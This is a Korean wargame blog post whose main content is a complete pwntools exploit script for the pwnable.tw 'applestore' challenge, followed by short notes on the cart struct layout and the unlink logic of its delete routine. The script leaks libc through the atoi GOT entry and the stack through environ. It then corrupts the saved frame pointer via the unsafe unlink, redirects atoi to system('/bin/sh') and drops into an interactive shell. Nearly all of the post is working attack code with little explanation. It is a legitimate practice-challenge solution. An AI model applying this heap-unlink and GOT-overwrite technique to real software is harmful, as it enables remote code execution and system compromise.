Wargame/▷ pwnable.tw
[pwnable.tw] applestore
Gyeongje
2018. 8. 3. 20:23
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 | from pwn import * def add(n): r.sendlineafter("> ", '2') r.sendlineafter("Number> ", str(n)) r = remote('chall.pwnable.tw', 10104) #r = process("./applestore") e = ELF("./applestore") #libc = ELF("/lib/i386-linux-gnu/libc.so.6") libc = ELF("./libc_32.so.6") for i in range(6): add(1) for i in range(20): add(2) r.sendlineafter("> ", '5') r.sendlineafter('(y/n) > ', 'y') r.sendlineafter("> ", '4') r.sendlineafter('(y/n) > ', 'y\x00' + p32(e.got["atoi"]) + "\x00" * 8) r.recvuntil('27: ') atoi = u32(r.recv(4)) base = atoi - libc.symbols["atoi"] environ = base + libc.symbols['environ'] system = base + libc.symbols["system"] binsh = base + next(libc.search("/bin/sh")) log.info("atoi : " + hex(atoi)) log.info("base : " + hex(base)) log.info("environ : " + hex(environ)) log.info("system : " + hex(system)) log.info("binsh : " + hex(binsh)) r.sendlineafter("> ", '4') r.sendlineafter('(y/n) > ', 'y\x00' + p32(environ) + "\x00" * 8) r.recvuntil('27: ') environ_addr = u32(r.recv(4)) log.info("environ_addr : " + hex(environ_addr)) stack = environ_addr - 0xe4 #handler [ebp-0x20] ebp = environ_addr - 0xc4 #handler sfp log.info('handler_Stack : ' + hex(stack)) log.info('handler_EBP : ' + hex(ebp)) r.recvuntil('> ') r.sendline('3') r.recvuntil('> ') r.sendline("27" + p32(atoi) + 'AAAA' + p32(stack) + p32(ebp - 0x8)) r.recvuntil('> ') r.sendline('06' + 'AAAA' + p32(system) + 'AAAA' + p32(binsh)) r.interactive() | cs |
1. %s 물품 == 0
2. %d 가격 == +4
3. 그후 물품 주소 == +8
4. 그전 물품 주소 == +0xc
delete 원리 {그후, 그전의 기준은 현재 물품}
(그전 물품 주소 + 8) = (그후 물품 주소)
(그후 물품 주소 + 0xc) = (그전 물품 주소)